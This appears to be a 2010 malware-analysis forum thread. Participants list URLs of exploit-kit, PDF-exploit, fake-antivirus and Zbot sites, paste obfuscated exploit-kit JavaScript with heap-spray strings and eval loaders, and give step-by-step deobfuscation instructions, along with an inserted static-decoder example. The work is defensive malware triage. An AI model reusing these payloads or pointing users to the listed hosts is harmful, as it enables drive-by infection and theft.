`(o0aan(xb`g2;elnom'peEi.abs-B`'otrr5=lFC`=`ru'bgpo=lrO.cobhi`)ITi(istFFirk`0hs0g;bli`vtbast)<Adw;Sn'ioned~`Plnl.i=E;ibl3F`cPCl'tttGd?eWo.aC`et;SJrapalidNte`lod0D;2t'c45cot'n'=ren`aoo)p`tuWtvtgdnegacep'sMtitf'ef`e.ee`)djrocnb=A4d;;}R`msorea)86366rF7C2i601F0C18C69EE24F24E1DCF9925F1008B8C3F49088B698E7EE34B0EFDFE6FF0C33532E8035686E301C050FE2562F78A49069776BEC002B032534E9DBEE947a00003E0006463656E0D4C747966426210070001040101522=02056E016n(S)e'|,,Ws',Wd9'A6406A252E68340Na82F50246F36677620,h'FF+0628252E2E25}4ah2Fe328282A60646(01aF9m5B75555F4667={528F+32A553469763anehtvcrb.dr0(0.fyV=,o=..ine;.=sfv((f>{nl&WpeIau,`nch9$v31n'0'{o0S;`pu0m
)s8sf001F00000080522952060C00017609736564656D3E6F63683F7C6263796E45056F46655F6C747861644E760D11081C0619010300010503030062020C0F0020020F00}}Se'``c05>a5c5u%b005u%8500u%09b3u%0029u%0c0eu%a0f8u%e0b8u%9010u%2f2fu%0005u%94f6u%9febu%8121u%3a5cu%30d1u%0001u%eef0u%9687uku%D200k7u%F21v46u%63u(3)u`ao5sh0Ah+oh`ifwma;tteoaM)rca;t``lqs`+`rumpMtF)D0r`IotT`Myvug9`nlm2(v``elrt.iu`u`l6}oosr`t`;;)l``~a)`(tth(gthat.aeru`snaoai~N)l(~p4``sssnsi``2csetet.`tsucdhiotd.fnc)`t)rns;tlfntraztzzhs`lzoIEsa``cnscFb)oY`vo~o``````tf`MG`0n`)uInce:`o`b1e-mg1}`%`;`(t%sn8lbobsc)ppcb8l=(1`as`cese=ldarji4Dh<cBHe4`a28w~'se`jelb``obQhljem({nin0oiaLLo`dAx*cct`se<=a.ove.;1toi}(tdbcdn(<o(a>eoo`lpdus-Cqt'rl)eryElinrd.vl{lc}MA`r.va=oa`rde.:0C}`e)lEFh`e)tO`u-t=vld;p{c)Fia`hga=.rr=agwoAnil`muetidve.'PCbt`j~E5c}}fA(eowi.){79682e6926;5A0F08CC7A454875E5F3A9C1C0C270E57BCC19FD7B01F349B85C02F00F695F50F8505081600D0BC286500FFF7C2FB338B140ED66F2B0C4BD175E8B3180F10r0000B50006667979606F64624E6461680407000003020D47'200796025e'h.rW(00Iv)6IaB8F306C2459223530`=A7F00A2864366870'0e+80t0232658212A5i5me75s29254A6A656Bs'+m50eE5E2F5F28267=fE+25'294449676361tkl(iarausti)''au{e//rlsmttIlj=k'=l''=Sfs&PgtMtt4F=t.'vn60=),Wvp8Cw<+b/e;s98d401F000610D3C480001106304736D766C556E21261976792A646C6A694C747E61696E5574627461491F70011A0E0005051901130001010A0040DE42111A476202100ec((jiwlD3<t05d6u%8870u%e000u%c823u%0550u%26a0u%0090u%0490u%0500u%f8f9u%0047u%1756u%dc5au%b1b0u%b06au%26fau%00beu%b407u%4630d2u%F60d06u%E3a626u%Fn);{nhxc5ee0Ai`ci=sufsn}oiniba;ott}of(eutl`+ebpefiT{r)g0nEfj*f.amiA=ue``na(0n2eynor+n+2);tnigara}}`osa;g{ntraia.h(ryzgmbn=.gclr+oH;e3)r`t(ttigiz=27ai`h~ap=h.nPTinlGVputo;ih;ge.eyzutyineheerimeewcN`r?(oePBuc;tS=af`f4+a0~~``>abb8`0/nC(x``&w+e6.1ut3vuui`+jOuhe)eInlhk{e`(l0o`2)ippsuntnde=p`edBDe/uyT(5's50i0Ph=+et'jn=lju``eceevtmg,norAAnq2r82a'h}tt2`rcdirat0twnf).iuuCt'bn)y~mnnde.'ti12`(,e.;OepTa=diy/eoHlh}BVu`cim2wmI'omcC0Bc=E;s-4(=E;.B'npt`akydeoh;(orwtem'sai'rofvc'oahbndEnd(di)oaj`ePc65.e}uYn.f`ds;t46F76=42E7v708C0F3149BB48D6D3BA0200290E
50BC043888C0504CFCE035FF5EF84F565F05FE0301926F448D0EB00F07F6926F02ED5BB3BD368CE4D7C3258334DDD8C61`0000F9000696067650561790F756A690B06000201DA0A07F20207650E6wSoGsIs',N=|4Nt46B704662E5A747109tA5F'020623466606;,st60h70285E2A452Ef,es12a459572864246v)'eE232F2A592A4021'dA'A6055957762B780a)seoremtehb;f)pnvrE;mvpa((nvo7p)=vy)8Hwe(DoTEc(0Ln(S)e=',=|1Ia`0=h==s2mf899a0F0F50600054976000021C007305636C657F616F2776607E426161683F6462616E456F552C6245797664730A1604070907190F20020104015F000F0B030720020340la)~'dis-5/a%5048u%d510u%1005u%0124u%0f0cu%a800u%0008u%6000u%6618u%15d5u%0746u%27ebu%00d0u%f835u%386eu%68d0u%0885u%d475u%560+F6u%832797u%Dr8216u%c{f}ceA`3`a)As2)s`.nug2;toadet}tih;tulneret`tst.Cojie{u~tF-V`Cfl,tB`m`==ulw)g`t.enn`c`(`ey(z`rirei!ci`}]teyinsrlitg.g)[ac`n`he`+l(ta2;o=atraztze=56tzfe;gr`ixcc`sgla(rn)uf`it,wKmpUn)pnc`*``ozu`+(Le1``vuwjPvl}oX`r`|```rxA`b1=xcl`tx8cis,=1````~l3mh8an7`i=mP0ew/nC`oe.b(=0o0cb,;`.rtmtbdom'poc:2Ci'mIM)5<sD-d~Aa~`cE);u``ei(=ckC)e(e(3=ntSS`q)r6)p)<vre7t`ryoDpr;r)du{cvtmh.fuc;:;ec`oms,ed19=''aAvbae'm1(t)/TsCe(c(A`-o`p`.en)celA-Aa`loi19u`lvcJatlo'-i.on.`})n`i=Megwmpsad'ic`nseecdlncecn`sse'dolD3slln(ait:ge}r7E602/7E73a5001A16A8E8938BDF60EA7332FAA9060106B8BA3EC83F70A175FEBF38F7E0FF07B63384BBF86506BF75F61F42E787DFC961E46139244730D474D34DEEC179t00001CB00C6C655E0E52737D64496975060200010002040'02005E004C`hceiNv)2`=|,`a82F9069232F263A70,h'FF+0966763D2234}2ah2FeA642E2920582(01aF9m2F245628776A={528F+6212F2B27607WaA5F302F4247606760.;e)n`aeet'upr;pcasSv=.lt'ltfi1g;6<o;0Ok`lF.i(h'0Ae'h.r=)0'|5Nr=8ui`nt`oo959t0A8B3FF00064F2700000C50266A6679657275644F636C64646171652A6179027D4365432001647966426215020F020701090702000300030D0B620A420B05020202'st;<>=di14b;u%0cbau%6000u%00e0u%c059u%f628u%9005u%00a0u%001cu%a515u%20b0u%4616u%26bcu%3601u%5a00u%9fb0u%5c00u%55ebu%c644u%17'346u%8=4707u%`%F6D7utvuetal?5=p;~.`{.nxcn)(eynb()h}oo.eynegsinh~utyUUnVfMtm;(T1DUUu2`sCd`(``m2i;t=ufw(`t2~(&mpae=gnglf=azmi`hwpnc.gesh-fO{tg.feteai)e6hu7}t`gyinehe``68iel`})ofsd.t=.`er)oc{no<sh`fFpeUc{ege=2=
&weso8~EM0ccanfIEkz;tqf`a|S+2gfl+e6`ilobh6).gh``00~sa;e8``)rec=+`p`0lf2giPclll~`xc0kl`f<naae('Ccexebt036g+edL;2'i5Dt'Rl''tl.}ln=cce`tOh{rcV1)==(HHM`;a0;e;zai`0ube'rapy`i;onvr'eeig'tl'ndnlMceep(:DE`m'tpajm`,p5)e;foePxea)S=Jm`.nn`t{unaF0'tde2d19)dearEpiuoadtacdl(};`vd'o=of`tamo`eet/hidtcee)d.d=`ec.css-5usec)vn'`enfy46D366A603r3A03A2468A33632022F8D91839DAE6E7C307B3CD24BEF0EE64EF86FEBF464FF5508C255E87500F63C4051EF7E730907B64DF9C92604B58D3A4A39AECE402Ch00005BF006D6C4F56636303426F7564170B0008003B0B20;2020F506D6Aokto`=|89'(09=E7F00B3A2A262576'0e+C0t058633820697i8me78s6B2926567E24s'+m50e626552065286=fA+25'2B482A064B61ItE6B7062F46786C760rL{{`pt'(A,t.adetrica(mic.v(=n0m})7c}0Wliv(pm)`Q0SwSoGs'|,W(1```%nl0or-rr9+5a000F6FF0F0DCBE86F1008F0E684E60697017786166796C646A63736E427376646D4E74407961624E6461660E1819010701090700000001DA0860DE0F00008102096;ec}";this[eval(document.getElementById('jlhoi2').value)](document.getElementsByTagName('textarea')[0].value);</script>
3. Keep the number that is inside the "document.write" instruction. It is 1177 in our example.
4. Delete the "document.write" instruction (marked red).
function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}
document.write('<p>1177</p>');
var gwevh8=parseInt(izyqk.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);
var ipcncr='';
for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){ipcncr=ipcncr+emgves.charAt(iwazgry);}}
var ethmxz=ipcncr+"}MDAC();";
var isaqbpx=btbnhm7(ethmxz);
eval(isaqbpx);
5. Go to the next instruction. Replace the expression to the right of "=" by the number that you kept in step 3.
Your script should now look like this.
var emgves="...";  // the long obfuscated string from the original script, unchanged
// Character substitutions applied to the reassembled text
function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}
var gwevh8=1177;  // the number kept in step 3
var ipcncr='';
// Read every gwevh8-th character, starting at offset 0, then 1, then 2, ...
for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){
  for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){
    ipcncr=ipcncr+emgves.charAt(iwazgry);
  }
}
var ethmxz=ipcncr+"}MDAC();";
var isaqbpx=btbnhm7(ethmxz);
eval(isaqbpx);
Now run it. The eval result now contains the decoded script. Copy and paste the result into the top window and click "Format code" to make it more readable.
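The decoder stub in the post above (and the one in the later reply that ends up with gsyna=1002) is a fixed-stride transposition followed by four character substitutions, so the script can be recovered statically without calling eval. The following is an added example, not part of the original posts: the function names, the stub text and the sample data (stride 7, host x.example) are constructed for illustration.

```javascript
'use strict';

// Character substitutions applied by the stub's helper (btbnhm7 / hlhtkt on the page),
// in the same order the stub applies them.
const SUBSTITUTIONS = [
  [/`/g, ' '],
  [/~/g, '"'],
  [/\u00BB/g, String.fromCharCode(0x5 * 2)],  // » becomes a newline
  [/\u2022/g, String.fromCharCode(0x2E * 2)], // • becomes a backslash
];

// Recover the stride from the stub text instead of from a live DOM.
// Two forms appear on the page: a number written into a <p> element with
// document.write and read back via innerHTML, or a plain numeric literal.
function recoverStride(stub) {
  const viaDom = /document\.write\([^;]*?\+\s*'(\d+)'\s*\+/.exec(stub);
  const literal = /var\s+\w+\s*=\s*(\d+)\s*;\s*var\s+\w+\s*=\s*''\s*;\s*for\b/.exec(stub);
  const match = viaDom || literal;
  if (!match) throw new Error('stride not found in decoder stub');
  return parseInt(match[1], 10);
}

// Undo the transposition: read every stride-th character starting at
// offset 0, then offset 1, and so on. The stub's loop bound is "<= length";
// charAt() past the end returns '', so "< length" gives the same output.
function untranspose(data, stride) {
  if (!Number.isInteger(stride) || stride <= 0) {
    throw new RangeError('stride must be a positive integer');
  }
  let out = '';
  for (let offset = 0; offset < stride; offset++) {
    for (let i = offset; i < data.length; i += stride) out += data[i];
  }
  return out;
}

function applySubstitutions(text) {
  return SUBSTITUTIONS.reduce((acc, [re, rep]) => acc.replace(re, rep), text);
}

// Pull URL-looking strings out of the decoded text for triage.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>)]+/g) || [];
}

// Full static decode: the stub appends a fixed suffix to the transposed text
// before substituting, and only then hands the result to eval. Here the
// result is returned as text and never executed.
function decodeStatic(stub, data, suffix) {
  const stride = recoverStride(stub);
  const script = applySubstitutions(untranspose(data, stride) + suffix);
  return { stride, script, urls: extractUrls(script) };
}

// Constructed sample (not taken from the page): stub in the DOM read-back
// form with stride 7, and a short harmless script as the hidden text.
const SAMPLE_STUB =
  "document.write(String.fromCharCode(0x3c,112,62)+'7'+String.fromCharCode(0x3c,112,47,62));" +
  "var n=parseInt(b.getElementsByTagName('p')[0].innerHTML);";
const SAMPLE_DATA = 'vtap\u00BBceapmhMttr:ppDiu`/l?Aoru/eiCnn=x/==(`~.d8f)uhez~u{;tx.;nr';
const SAMPLE_SUFFIX = '}MDAC();';

const result = decodeStatic(SAMPLE_STUB, SAMPLE_DATA, SAMPLE_SUFFIX);
console.log('stride:', result.stride);
console.log(result.script);
console.log('urls:', result.urls);
```

For the sample in the later reply, the stride written by document.write is 1002 and the appended suffix is "EERS();}}MDAC();".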
-
http://obuddytv.com/sitemap/jdk.php
http://obuddytv.com/sitemap/trafflit.php
Exploit kit
http://obuddytv.com/sitemap/files/asshole.pdf
Pdf exploit
-
http://quindols.com/5sugm3fdkgad.php?s=IBBKB
Phoenix exploit kit
-
http://negup.co.cc/red.php
Redirects to phoenix exploit kit
-
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?
-
I don't get any content from this url.
-
Neither do I, but I did when it first exploited me. Maybe I do not have the main exploitation URL correct.
-
http://compaund.in/15/index.php
Phoenix exploit kit
-
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?
I don't get any content from this url.
These are tricky and usually there is only one shot - after which the accessing IP gets kind of blacklisted. As for this exact domain I dug up the following details:
First seen at Wed Nov 3 03:39:17 JST 2010
hxxp://eachdata.co.cc/get/?db=ssl&name=temp123&done=3&xml=undo&p=165&pool=ssl
Changed at Wed Nov 3 04:59:55 JST 2010
hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5
Changed at Wed Nov 3 06:20:41 JST 2010
< hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5
---
> hxxp://bulkservice.co.cc/get/index.php?p=165&name=temp123&db=do
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.
-
detect geo location
different exe for country
RU JP
http://www.virustotal.com/file-scan/report.html?id=96e247f3b8498fa8d8d96d7d691999d88feb81e85d6985fd58d5c13d10535c44-1288868795
DE IT US
http://www.virustotal.com/file-scan/report.html?id=35ec83e3efe40fc5121578a86ffe10998992851d5ca70be2defe877d0dcfe7bc-1288868719
-
Hmm, strange. The link to your 'RU JP sample' gives:
File: exe.php@x=jar5
Time: Thu Nov 4 13:50:01 UTC 2010
VT Result: 9 /43 (20.9%)
AntiVir TR/Crypt.XPACK.Gen2
Microsoft VirTool:Win32/Obfuscator.KC
Panda Suspicious file
PCTools SecurityToolFraud!Gen4
Prevx Medium Risk Malware
Sunbelt VirTool.Win32.Obfuscator.ah!e (v)
Symantec SecurityToolFraud!Gen4
TrendMicro TROJ_FAKEAV.SMBY
TrendMicro-HouseCall TROJ_FAKEAV.SMBY
6018008c56790c712abb90cb0113bdcb
--------
A sample which I just got via JP IP gave:
File: exe.phpx=jar5-04nov10.txt
Time: Thu Nov 4 13:50:30 UTC 2010
VT Result: 18/ 43 (41.9%)
AntiVir TR/Crypt.XPACK.Gen
Authentium W32/Trojan3.CHI
AVG Agent.5.AK
BitDefender Gen:Variant.Kazy.2562
DrWeb Trojan.Packed.20878
F-Prot W32/Trojan3.CHI
F-Secure Gen:Variant.Kazy.2562
GData Gen:Variant.Kazy.2562
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious.H
Microsoft TrojanDownloader:Win32/Waledac.C
NOD32 a variant of Win32/Kryptik.HWR
Norman W32/Fitmu.A!genr
nProtect Gen:Variant.Kazy.2562
Panda Trj/Sinowal.XHS
Prevx Medium Risk Malware
Sophos Mal/Zbot-AN
TrendMicro Cryp_Bredo-14
TrendMicro-HouseCall Cryp_Bredo-14
MD5 be89942e0c9bb6012fe83f372bf83805
----
Something odd there.
-
http://moionfolt.com/20x562fzx5j5.php?s=IBBGA
Phoenix exploit kit
-
http://taeliterup.ru/in.cgi?5
Redirects to fake scanner page
http://microsoftwindowssecurity912.com/a09/TrojanRemovalKit.exe
Fake AV
-
http://volan3.cz.cc/index.php?s=2&u=4cb5a76e808c54cb5a76e80cf2
Exploit kit?
-
http://retroman.in/1/show.php?key=87c1a082278ace8fdf2f63b86db29d6f&u=iddqd
Exploit kit
-
http://timecapsuie.com/nte/avorp1vena.html
NeoSploit
-
http://weqar.com/tre/vena.asp
NeoSploit
-
http://feraus.com/tre/VENA.asp
NeoSploit
-
http://overtus.net/tre/VENA.py
NeoSploit
-
http://vahtang.in/in.cgi?2=
Redirects to exploit kit
-
http://portugallll.cz.cc/show.php?s=151d20cf59
Exploit kit
-
http://pizdecsilamzla.co.cc/show.php?s=8435b302a7
Exploit kit
-
http://alexastatscounter.info/tre/vena.php
NeoSploit
-
http://bbdeals22.net/pek/xuiqdwcweljsfoamdmcr.php
Exploit kit
-
http://perfecturl.co.cc/user/?catid=kostes&term=cash&offset=redirect&ID=21939
Exploit kit
-
http://skeurwondre.info/tre/VENA.asp
NeoSploit
http://clean-domain.com/redirect.php
Redirects to exploit kit
-
http://remote99.cz.cc/index.php?u=4cdac678896da4cdac67889abe
Exploit kit?
-
http://uvpcpmg.co.cc/
Redirects to exploit kit.
-
http://listplus.co.cc/news/?acc=189&author=softik&up=4
Exploit kit?
-
http://eswhc.co.cc/
Redirects to exploit kit.
-
http://109.196.134.28/afi/xp.php?i=8
Zbot
I lost the URL to the actual exploit kit.
-
I found it.
http://atlantisc.net/afi/iqgmcmjv.php
Exploit kit
http://atlantisc.net/afi/xp.php?i=8
or
http://109.196.134.28/afi/xp.php?i=8
Zbot
-
http://autoseon7.com/nort1/tc.php
Redirects to fake scanner page.
-
http://akari.cz.cc/index.php?s=2&u=4cdd70e54ff1c4cdd70e550303&p=2
Exploit kit?
-
http://onlytdss.net/in.cgi?4=
Redirects to exploit kit.
http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
Exploit kit.
http://onlinediller22.net/pek/inczxrbphohpa5.pdf
Pdf exploit.
http://onlinediller22.net/pek/yr.php?i=8
Fake AV.
-
http://welescold.tk/?ID=19834
Redirects to exploit kit.
-
http://jnermovies.com/us.html
Iframes direct to exploits.
http://kojise.info/shop/anbwembretyzxnitju.php
http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
http://megaresolve.co.cc/news/index.php?author=try2&pg=196&table=undo
Exploit kits
-
http://clean-domain.com/redirect.php?a=19776&s=MDctMTFnMg
Redirects to exploit kit
http://justdomain.in/dpcsjzi.php
Exploit kit
http://justdomain.in/fnb.php?i=8
Trojan
-
http://ozone777.com/2/bmauesknauxnyvxzkuyp.php
Exploit kit
http://ozone777.com/2/dojtfuatjrgo.pdf
Pdf exploit
-
http://193.23.126.40/afi/fldwgmcwdof.php
Exploit kit
I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload? Thanks.
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param
name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body> <textarea>function
hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(//ig,String.fromCharCode(0x5*2)).replace(//ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var
czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa;
hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var
asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);</textarea>
<textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea
id='aubqcsx' name='aubqcsx'>var bnfzxnh="dy<h=-0~=%5c%44%00%56%5f%8e%98%08%0f%5e%4e%00%80%05%0c%c5%c0%56%77%60%30%0c%00%03%f0%3c%01%00%8e%56%66%v%33%73s7%26%0=22%66'(utahl5`ea``)are.m(tK{{b.pgi)tttoc`hvi)tf(Mz`a~neOtMu`)4lun`.)=)``;yi`sFi`;e`y~Sreio~`i=m;~amb;.(.=tly`e`io;o4Ntu.={`agne```liuAHfpi(ol)iegpVoorunc.KyPNctg`assr`e}{je8`1`nIMsEpSue~a=`}`nmf`mSiu0*tfjz1fl`oe8e+e`u`heI~enhucblg=;ul0ib`;.){tdec(oeod-w''tMave28t`m`~eeertreTriem{ologn=c}nr)(q=0ta(re}c)dob<r}aEmde.)t=n`'tkiotrA'-EC.=e;e'o9.siv.,(e(cuy-cta'osec(`EF}dns00(otdn=ti'itdci(nSoi'dae'e'>'nlmife<ledddL'rejlbl64s{'A`e'c'f(4210aFE8Ce30337DF90AE9FF97C2C8944D035043887560E877F588F8F8805655F38013F8885705F55C0362370F49108E62637D7244143109BF2C20000900667016667764066646700000000000060m00066026iehvI=v(|',0aa8302722576320,aa8305673366620,aa8302222254220,aa8302255662260,aa8302422224620,aa8302244736660eF}uva;'et)aul)tEr]i=ilvef')|)ri3h`<msTcU}tbh.o1's)10y(`hxn0h)9)p301F504105D2E9000113E965C35BF5454529993A1929EEF3AAE58E4A545F5C0444DA13F1455160B67619A173010174030A222000A0022231DRo>Otc10)'ud0u00u10ue8ue6u8eu59u09u0fuaaueau20u10u06u02u22u30u41u94ue0u10u06u30u21uc4u11u20u02u0bu2eu65uau31u0Dk4uE6u0sFEu48;)nyxil3(`l++{lrmns0y`iveat`d;yihw3lias;yCnfo=r;uMMffnf{52mu>s``;<+}pou.Fs1e.tp`tg{zw`af`[}snes}paf`ee.=wOsr`l,Hhtp`var)g`3s=ozsU(u`s)tS{ncetnuu`nc4nF.jeoy~Sreio~`itIM`=)<ec~PNrXn;sn`2i0`u`1`csrx4oume0)emf.)l`s=70YwC%lcertllt`}no)ns0`n;ve=nu'c)b:Bi+;BLracB0h'ev'cmrsrociyvCe}n.S(=7aec`;)q`chr0([vr;ecd1ictPei(b;B~cs>.'oc(itc13rX`lvc)p3petae2elehn`jotf;roru'=CEcoti-5uc(ot`in;ooyulucWnd3=m=>=`<falecli/en)dcoc`reesaE5ur,S=.)u]d)7363r6676108F4F8CEBB3452C75A0B8A0103680CBB4464B95CE73BF00B382800F3928C4DBD0514C0540A5ED4E4863E373141523C972E9432BC83=000C9006D3941512454DA13F14175D0003912F01e2211C0E9vF.eN'=s|)0,mm2700265F842000mm270F9456DB1000mm2700383AE0AA10mm270999E8707700mm27090AA8B76000mm270956729F360pL}natp,(t;mmd{VS`+fltv.I`b;|{yf1vi=geIhIfrj.Gn0Wv|,,;'Si1ox);9{`0001600007B800F800600664074476677236766573666766466666660464566476466
76660110000000000020000003D6DDD430400200006FSc<B=l10;%90%08%50%5c%0c%00%4f%50%80%09%89%06%ce%e0%e0%d8%55%07%47%66%7f%a0%ba%51%05%00%81%00%fc%25%66%2r73%62%d%33%73k3%32%f{c.Aso5h:```t;apegx.=fo)sy=(}poi``esi.}pUuCE=g}mfz)Ccuv6``m>u+(w``;ennvF.6mNae|r.se`+``utitcmteuruf`cf`fL.`ie`(i3rfarg{t=2i=cehTan=.;yktgt(y`nn(t4(eufIMup`tg{zw`afhc`b`;`wL)jeoqcitc4;f)ss10zB`n68tnp`0``u`l{l(~`c;bfiul3lniochuhcc{atxie}aE'dmdu;j0Cd'dy``rtF-=>=a`teHioltm{ehCi`Qt0=6tltqv;.u0<`,iiaebfuy0bauEnv'ody<lt<g)nu'btl16eMplat;e.hnerx))l)(c{ampii.f'mO`7Dac(d0F)u'c('m;nno.md)hF``0'`'<'v/rmoDaagovt.c)wloCcnts-5be`H`i!m;a{436F`4301=002DA37A26F86EFE1C3C47276C853850028850E1B4ED578CC55FF55C65538444F302C510E27767F3D64F2713F04C8B45533A2DE199'0000A00666466066066466766610000000000D00304026046el9r`W=v(|'1eeA906655273330,eeA502773327770,eeA506222227220,eeA502254626270,eeA505722254260,eeA902254636660lAccre.`'rpee(tecf))v([jn(l}(St`)hf9r{M`CuyeSe',In|01v%Cl0p1;f5m+9085E0110D7000F600C00455D0385EF24E0E35833AAE4428455E525255E4F9242945342955AA8FC819981932020311006000700FB052229CL(udJ0sC>vuc0ucbu70uf2u02u06u5fu00u92u15u05u1eu6aua0ua0u01uf8u04uc2u59u59ud0uddu0bu01u30u9bu00ufeue5uc4ue`09u9Eu2u26u02dAu0Fuuvtfl.c)e`=t2h}ytw)bf``i)i.`M;ens~sn.lv;eXmUF`ur`Co`U.na7=&`>b`whwve.(eaFv)pHgo|ili`~`m(nafre[rlsgnuttufuEz(+a~2s2ourg`sh``z`a`e3rc`z}pvh`o).=ttv;(awvuc`ne|r.se`+``rLby(fcfE;IMtltfre`}`{it62nP1`8;yce=8!ss1etcs)ue`Iug0c(l`oc)`ne(kblr2`w}rlsCeimve28t>oI=t``2D~'~l+>nTol`(ecXehf=ur,77csiqavlncztz=]radam);utsEt'idoIbiy/e.`moursD'aL..r(tn2pd(`e;`e`etvr:/fat)eB'-Ctu'`44;mOu'aed./lae(;((L=0Bnf/aapyewotshb`.i){eabatgrsA3stvS(n=emtt7266r7637'A001D24D1024D63DF91252B500BECBF374BB27CF39C08E3E103FF0505003D666FC3B60408F906C4AC454DD9EE46D7D903DF707005400000F00C58DE9649CE9453429562970021AA2031=270E90DEXa's9I'=s|)112F00AFEEA65140112F000423405300212F00B5958AE660412F009645704030412F00FE889F6070612F00BB46F86180aSat`Esfwi.bnprrri,[.'0otljesHb()s(3csE(Kn{cht)0N=('5au=e0=0mo<e`60006000F162200000600067666676707631742764646662667776674764566767
667166100100000010011000000
-
I had to exploit myself to get this.
http://193.23.126.40/afi/dz7.php?i=8
Trojan
I do not see dz7 in the code anywhere.
:(
-
I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload? Thanks.
You have to deobfuscate the code first. I use Malzilla to do that. Malzilla requires that we modify the code a bit.
1.) Let's start at the end. Everything behind the last " can be deleted. So replace
</textarea><script>document.write('<font>eval</font>');this[document.getElementsByTagName('font')[0].innerHTML](document.getElementById('aubqcsx').value);this[eval(document.getElementById('bogpc').value)](document.getElementsByTagName('textarea')[0].value);</script>
with a semicolon.
2.) Continue at the beginning. Delete everything before the first textarea tag. That means deleting this code
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body>
<textarea>
3.) Cut the code from the beginning (function) to the closing textarea tag. Now paste this code at the end of the script.
function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);
4.) Go to the start of the script. Delete everything from the start of the script to "var "
</textarea>
<textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea id='aubqcsx' name='aubqcsx'>
5.) Now go back to the code that we pasted at the end of the script. There is a "document.write" instruction. In the middle of the instruction is a number.
In your example it's 1002. Keep that number and delete the complete document.write instruction.
6.) Now go to the next instruction. In your example it is
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML)
Replace the right-hand expression of this instruction with the number you kept from the previous instruction. That means
gsyna=1002
7.) If you did all previous steps correctly, your code should look like this.
